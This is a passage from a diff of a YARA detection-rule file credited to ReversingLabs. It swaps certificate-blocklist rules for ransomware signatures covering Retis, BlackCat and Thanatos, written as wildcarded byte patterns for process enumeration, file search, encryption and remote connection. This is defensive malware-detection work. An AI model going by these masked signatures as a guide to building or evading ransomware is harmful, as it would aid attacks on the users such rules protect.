?? ?? 49 8B D4 48 8D 0D ?? ?? ?? ?? FF C0 4C 63 C0 E8 ?? ?? ?? ?? 48 8B 05 + ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? + ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ?? 48 85 C0 74 ?? 48 8B 0D ?? ?? + ?? ?? FF 50 ?? 48 8B 05 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 33 D2 44 8D 42 ?? FF D0 48 + 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 48 63 85 ?? ?? ?? ?? 48 3D ?? + ?? ?? ?? 73 ?? 0F 1F 00 48 63 85 ?? ?? ?? ?? 42 C6 04 28 ?? FF 85 ?? ?? ?? ?? 48 63 + 85 ?? ?? ?? ?? 48 3D ?? ?? ?? ?? 72 ?? 4C 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? + 5E 5B 5D C3 + } + $enum_procs = { + 40 56 48 81 EC ?? ?? ?? ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? C7 44 24 + ?? ?? ?? ?? ?? 48 8B C8 48 8B F0 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 89 9C + 24 ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D 2D ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? + 0F 1F 40 ?? 0F 1F 84 00 ?? ?? ?? ?? 33 DB 48 8B FD 66 66 66 0F 1F 84 00 ?? ?? 00 00 + 48 8B 0F 48 8D 54 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF C3 48 83 C7 ?? 83 FB ?? 72 + ?? EB ?? 44 8B 44 24 ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? BA + ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 + 8B CE FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? + 48 8B 9C 24 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5E C3 + } + $enum_shares = { + 48 83 EC ?? 33 D2 C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 4C + 8B C9 48 89 44 24 ?? 8D 4A ?? 44 8D 42 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + 48 89 5C 24 ?? 8B 5C 24 ?? 48 89 7C 24 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 48 8B 0D ?? + ?? ?? ?? 4C 8D 43 ?? BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 48 8B + 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C0 48 8D 54 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 66 0F + 1F 44 00 ?? 33 DB 39 5C 24 ?? 76 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8D 0C 5B 48 C1 E1 ?? + 48 03 CF F6 41 ?? ?? 74 ?? E8 ?? ?? ?? ?? EB ?? 48 8B 49 ?? E8 ?? ?? ?? ?? FF C3 3B + 5C 24 ?? 72 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C7 48 8D 54 24 ?? FF 15 ?? ?? ?? + ?? 85 C0 74 ?? 48 8B 0D ?? ?? ?? ?? 4C 8B C7 33 D2 FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? + FF 15 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 5C 24 ?? 48 83 C4 ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Banco do Brasil S.A." and pe.signatures[i].serial=="7d:32:50:b2:7e:05:47:c7:73:07:03:04:91:b4:28:02" and 1412207999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_shares) and ($enum_procs) and ($find_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_00D1836Bd37C331A67 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Retis : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Retis ransomware." author = "ReversingLabs" - id = "4d99e2ee-823e-568d-88b1-48aaf6d44286" - date = "2023-11-08" - modified = "2023-11-08" + id = "3d1de7c2-abb7-5411-a598-6bc68229a22a" + date = "2021-08-12" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1216-L1234" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8af1d10085c5be8924eb6e4ea3a9b8e936c7706d8ec43d42f24a9a293c7f9d27" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Retis.yara#L1-L74" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3e3429041acc5730b009916efbcd35c7cfd2b2877dc1d2cf980f7fb7d399d532" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Retis" + tc_detection_factor = 5 importance = 25 + strings: + $search_files = { + 00 00 04 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C 00 08 28 ?? ?? ?? ?? + 0A 72 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 03 6F ?? ?? ?? + ?? 0D 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 06 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? + ?? 17 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? + 12 ?? 28 ?? ?? ?? ?? 13 07 00 11 ?? 73 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 16 FE + ?? 13 ?? 11 ?? 2C ?? 00 02 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ?? + 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? + ?? 00 00 2B ?? 00 1F ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? + ?? 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 12 ?? + 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 DE + ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? + 6F ?? ?? ?? ?? 00 DC 00 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? + ?? 6F ?? ?? ?? ?? 00 DC 2A + } + $search_drives = { + 00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 + 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 07 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? + ?? 6F ?? ?? ?? ?? 00 00 00 09 17 58 0D 09 08 8E 69 32 ?? 07 72 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 26 00 07 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? + 13 ?? 00 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 00 03 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? + 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? + ?? 17 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? + 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 02 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? + 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 11 ?? 6F + ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE ?? + ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? + ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 12 ?? + 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 + DC 2A + } + $encrypt_files = { + 00 03 19 17 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 0B 06 07 + 16 07 8E 69 6F ?? ?? ?? ?? 26 06 6F ?? ?? ?? ?? 00 03 18 18 73 ?? ?? ?? ?? + 0C 73 ?? ?? ?? ?? 0D 09 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F + ?? ?? ?? ?? 00 09 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? + ?? ?? 00 09 6F ?? ?? ?? ?? 13 ?? 08 11 ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 07 + 16 07 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 + 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MINDSTORM LLC" and (pe.signatures[i].serial=="00:d1:83:6b:d3:7c:33:1a:67" or pe.signatures[i].serial=="d1:83:6b:d3:7c:33:1a:67") and 1422835199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($search_files and $search_drives and $encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_2Ca028D1A4De0Eb743135Edecf74D7Af : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Blackcat : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects BlackCat ransomware." author = "ReversingLabs" - id = "19e1bce7-ad37-5223-b934-b20e78dfd071" - date = "2023-11-08" - modified = "2023-11-08" + id = "e623340d-8df8-5f13-b75f-379bd0038f64" + date = "2022-02-14" + modified = "2022-02-14" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1236-L1252" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "60b6351194e23153d425eaa0c25f840080a29abb5eb1bbcd41bb76a3d4130edd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.BlackCat.yara#L1-L109" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "24932baa625aedd14b5776ba3209c9ee330e84538c5267eeb5e09e352f655835" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "BlackCat" + tc_detection_factor = 5 importance = 25 + strings: + $remote_connection_p1 = { + 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? A1 ?? + ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 + ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? + ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 83 F8 ?? A1 ?? ?? ?? ?? 0F 45 C1 8B 0D ?? ?? + ?? ?? 0F 45 CA 8D 54 24 ?? 89 94 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? + ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 + 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? + ?? ?? ?? 56 51 FF 50 ?? 83 C4 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ?? + FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? + ?? ?? 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 + ?? E8 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? + ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 85 + } + $remote_connection_p2 = { + C0 89 44 24 ?? 0F 88 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? 74 ?? A1 ?? ?? ?? ?? 89 CB 85 C0 + 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 74 24 ?? 6A ?? 50 E8 + ?? ?? ?? ?? 85 C0 89 D9 75 ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 5C 24 ?? 89 44 24 ?? + 53 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 89 F1 8D 54 24 ?? 89 44 24 ?? 89 5C 24 + ?? 89 5C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? + ?? 8B 84 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? + ?? ?? ?? 3D ?? ?? ?? ?? 0F 43 C1 6A ?? 50 53 FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 + 44 24 ?? 75 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 7C 24 ?? ?? 74 ?? FF 74 24 ?? 6A ?? FF 35 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 5C 24 ?? 0F 84 ?? ?? ?? ?? 80 BB ?? ?? ?? ?? + ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB + } + $enum_procs = { + 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 39 F7 74 ?? + 69 C7 ?? ?? ?? ?? 89 4D ?? 01 C8 68 ?? ?? ?? ?? 89 DE 53 50 E8 ?? ?? ?? ?? 83 C4 ?? + 47 8D 85 ?? ?? ?? ?? 89 7D ?? 50 8B 5D ?? 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 89 + F3 89 C6 EB ?? 8D 4D ?? 89 F2 E8 ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? EB ?? 31 FF 8B 75 ?? + 85 FF 75 ?? E9 ?? ?? ?? ?? 31 FF 53 E8 ?? ?? ?? ?? 8B 75 ?? 85 FF 0F 84 ?? ?? ?? ?? + 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 69 C7 ?? ?? ?? ?? 8B 4D ?? 8D BD ?? ?? ?? ?? 01 F0 89 + 45 ?? 8B 45 ?? 8D 04 40 8D 04 81 89 45 ?? EB + } + $find_files = { + 57 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 53 56 E8 ?? ?? ?? + ?? 83 F8 ?? 89 45 ?? 0F 84 ?? ?? ?? ?? 89 75 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? + ?? ?? 85 C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 0F + 84 ?? ?? ?? ?? 89 C6 8B 45 ?? 8B 4D ?? 89 46 ?? 8B 45 ?? 89 46 ?? 8B 45 ?? 89 46 ?? + 8D 41 ?? C7 06 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 CB 50 E8 ?? ?? + ?? ?? 83 C4 ?? 8B 45 ?? 89 43 ?? 89 73 ?? 8B 75 ?? 31 C0 C7 43 ?? ?? ?? ?? ?? F7 45 + ?? ?? ?? ?? ?? 89 03 75 ?? 83 7D ?? ?? 74 ?? 57 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 74 ?? 83 7D ?? ?? 74 ?? FF 75 ?? 6A ?? FF 35 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5E 5F 5B 5D C3 + } + $encrypt_files_p1 = { + B8 ?? ?? ?? ?? 8D 4D ?? 8D 95 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 75 + ?? 8D 4D ?? 89 FA 56 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 8B 5D ?? 89 + 45 ?? 8B 45 ?? 83 F8 ?? 72 ?? 85 DB 74 ?? 0F B7 0B 81 F9 ?? ?? ?? ?? 75 ?? 8B 4B ?? + 89 C2 29 CA 72 ?? 83 FA ?? 72 ?? 85 DB 74 ?? 81 3C 0B ?? ?? ?? ?? 75 ?? 0F B7 54 0B + ?? 81 FA ?? ?? ?? ?? 75 ?? 0F B7 54 0B ?? 83 EA ?? 89 55 ?? BA ?? ?? ?? ?? 19 D2 89 + 55 ?? 72 ?? 83 F9 ?? 76 + } + $encrypt_files_p2 = { + 53 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 57 + 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 51 ?? 29 D0 8B 55 ?? 0F 92 + 45 ?? 83 7D ?? ?? 75 ?? 80 7D ?? ?? 75 ?? 39 C2 77 ?? B8 ?? ?? ?? ?? F7 64 0B ?? 8B + 55 ?? 70 ?? 39 C2 72 ?? 8B 44 0B ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 45 ?? 8B 85 ?? + ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? + 89 45 ?? 89 10 89 48 ?? 8B 45 ?? 89 45 ?? 53 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? + 8B 45 ?? 8B 4D ?? 29 45 ?? 3B 4D ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? E8 ?? ?? ?? + ?? 8B 45 ?? 8B 4D ?? 89 45 ?? 89 4D ?? E9 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B 35 ?? ?? + ?? ?? 8B 45 ?? F2 0F 10 45 ?? 85 F6 89 85 ?? ?? ?? ?? F2 0F 11 85 ?? ?? ?? ?? 0F 84 + ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 8D 0C C0 8D 3C 49 01 C7 01 F7 EB + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="2c:a0:28:d1:a4:de:0e:b7:43:13:5e:de:cf:74:d7:af" and 1341792000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_procs) and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Dbb14Dcf973Eada14Ece7Ea79C895C11 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Thanatos : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Thanatos ransomware." author = "ReversingLabs" - id = "139f2e4f-7997-5cfd-aba2-dcf8d7525f5e" - date = "2023-11-08" - modified = "2023-11-08" + id = "190adbd0-30a7-5619-ab70-3ab031ece2f7" + date = "2020-11-13" + modified = "2020-11-13" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1254-L1270" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c73c83f5cb6d840b887e1aa41e96a29529f975434ac27a5aa57f2e14b342f63d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Thanatos.yara#L1-L85" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a51fa9cf1a08e4cd252a8b385be3bfde909585e2a799baaede977e40ecff5313" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Thanatos" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 50 89 85 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? 51 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 89 85 ?? ?? ?? ?? EB ?? 8D 49 ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? C6 03 ?? FF + 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? + ?? ?? F7 F9 52 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 4F 75 ?? 8B 95 ?? ?? ?? + ?? 52 8D 85 ?? ?? ?? ?? 50 C6 43 ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? 51 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF D6 F6 85 ?? ?? ?? ?? ?? + 74 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D7 85 C0 0F 84 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 + 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D BD + ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8B F8 72 ?? 8B + 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 FF ?? 74 ?? 53 8D 9D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? + ?? 8B E5 5D C3 + } + $encrypt_files_p1 = { + 55 8B EC 83 EC ?? 53 56 57 68 ?? ?? ?? ?? 33 DB 6A ?? 53 8B F0 53 8D 45 ?? 33 FF 50 + 89 7D ?? 89 5D ?? 89 5D ?? 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55 + ?? 8D 4D ?? 51 53 53 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B + C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 53 2B C2 50 8B 45 ?? 56 50 FF 15 ?? ?? ?? ?? 85 C0 + 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8D 4D ?? 51 6A ?? 52 68 ?? ?? ?? ?? 50 FF 15 ?? + ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 50 8D 4D ?? 51 53 53 6A ?? 53 8B + 1D ?? ?? ?? ?? 52 89 45 ?? FF D3 85 C0 74 ?? 8B 45 ?? 8B 3D ?? ?? ?? ?? 50 6A ?? FF + D7 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B 4D ?? 8B 55 ?? 8B 02 51 50 56 E8 ?? ?? + ?? ?? 8B 4D ?? 8B 45 ?? 83 C4 ?? 51 8D 55 ?? 52 56 6A ?? 6A ?? 6A ?? 50 FF D3 85 C0 + 74 ?? 8B 5D ?? 8B 0B 51 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 89 10 89 + 33 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 DB 8B 55 ?? 52 FF + 15 ?? ?? ?? ?? 8B 45 ?? 53 50 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2 + } + $encrypt_files_p2 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 